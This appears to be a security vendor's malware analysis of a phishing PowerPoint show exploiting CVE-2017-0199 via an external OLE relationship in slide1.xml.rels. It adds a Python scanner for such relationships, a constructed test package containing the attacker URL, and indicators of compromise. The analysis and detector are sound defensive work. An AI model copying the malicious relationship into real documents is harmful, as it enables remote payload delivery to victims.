ISSP

Intruders used CVE-2017-0199 vulnerability

Updated: Oct 18, 2022

The e-mail OriginalMessage.txt.msg contains an attachment with the malicious file Prezent_UA_2k_berezen_PRESS.ppsx, which is a 16-slide presentation on the socio-political situation in Ukraine.

Example of a slide from the file Prezent_UA_2k_berezen_PRESS.ppsx

How does this malicious file work?

The malicious file is interesting because it does not contain any embedded malicious macros. Instead, the intruders used the CVE-2017-0199 vulnerability, which allows a malicious PPSX file to be generated and a payload delivered to the victim without any complex configuration. The file slide1.xml.rels is used in the exploitation. Files with the .rels extension are relationship files: they describe how the parts of a Microsoft Office document fit together, and this information is also called "relationship parts". In this malicious presentation, the address hxxp://socis.cf/?file=wj5yuxmp.hmf was written into the slide1.xml.rels file:

Content of the slide1.xml.rels file

If you open hxxp://socis.cf/?file=wj5yuxmp.hmf, you will see a script that creates a malicious file in the %temp% directory and runs it. At the time of analysis, this address was no longer available.
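The check a defender wants after reading the above is a scanner that opens an OOXML package (PPSX, PPTX, DOCX, XLSX are all zip containers), reads every .rels part and reports relationships that point outside the package. The following is an added example written for this post, not code from ISSP; the scanner it implements flags any TargetMode="External" relationship that is not a plain hyperlink and ranks OLE-object relationships highest, since that is the shape CVE-2017-0199 documents take. The sample package built by build_sample_ppsx() is constructed test data: the post shows the real slide1.xml.rels only as an image, so its exact markup is assumed, and the defanged URL from the post is reused as the target.

```python
import io
import zipfile
import xml.etree.ElementTree as ET  # for untrusted files in production, prefer defusedxml
from urllib.parse import urlsplit

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
HYPERLINK_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"
LAYOUT_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout"
REMOTE_SCHEMES = {"http", "https", "ftp", "file"}


def external_relationships(ooxml_bytes):
    """Return (part_name, rel_id, rel_type, target) for every relationship in any
    *.rels part of the package that points outside it (TargetMode="External")."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(ooxml_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal").lower() != "external":
                    continue
                findings.append((name, rel.get("Id"), rel.get("Type", ""), rel.get("Target", "")))
    return findings


def suspicious_relationships(ooxml_bytes):
    """Reduce external relationships to the ones Office resolves automatically when
    the document is opened. Hyperlinks are skipped because they need a user click;
    everything else external is reported, with OLE objects (the CVE-2017-0199
    pattern) and remote schemes ranked 'high'."""
    out = []
    for part, rid, rtype, target in external_relationships(ooxml_bytes):
        if rtype == HYPERLINK_TYPE:
            continue
        scheme = urlsplit(target).scheme.lower()
        severity = "high" if rtype == OLE_TYPE or scheme in REMOTE_SCHEMES else "medium"
        out.append({
            "part": part,
            "id": rid,
            "type": rtype.rsplit("/", 1)[-1],  # short name, e.g. 'oleObject'
            "target": target,
            "severity": severity,
        })
    return out


def build_sample_ppsx():
    """Constructed minimal PPSX-like package for testing the scanner. It is NOT the
    real Prezent_UA_2k_berezen_PRESS.ppsx; the markup of its slide1.xml.rels is an
    assumption, and the defanged URL from the post is reused as the OLE target."""
    slide_rels = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="{LAYOUT_TYPE}" Target="../slideLayouts/slideLayout1.xml"/>
  <Relationship Id="rId2" Type="{HYPERLINK_TYPE}" Target="https://example.org/" TargetMode="External"/>
  <Relationship Id="rId3" Type="{OLE_TYPE}" Target="hxxp://socis.cf/?file=wj5yuxmp.hmf" TargetMode="External"/>
</Relationships>"""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("_rels/.rels", f'<Relationships xmlns="{REL_NS}"/>')
        z.writestr("ppt/slides/slide1.xml", "<sld/>")
        z.writestr("ppt/slides/_rels/slide1.xml.rels", slide_rels)
    return buf.getvalue()


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_ppsx()
    for f in suspicious_relationships(data):
        print(f"[{f['severity']}] {f['part']} {f['id']} {f['type']} -> {f['target']}")
```

Run it with a path to any OOXML file to scan it, or with no argument to scan the constructed sample; a clean deck produces no output, while the sample reports the oleObject relationship in ppt/slides/_rels/slide1.xml.rels as high severity. The rels-level check is independent of macros and of the payload, which is why it still works on a document like this one that carries no VBA at all.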

Indicators of Compromise

URLs:

hxxp://socis.cf/?file=wj5yuxmp.hmf

IP addresses:

185.176.43.94 (Bulgaria)

Files:

Prezent_UA_2k_berezen_PRESS.ppsx

MD5: CAFB6B5795C26376289832CFFC3AEE94
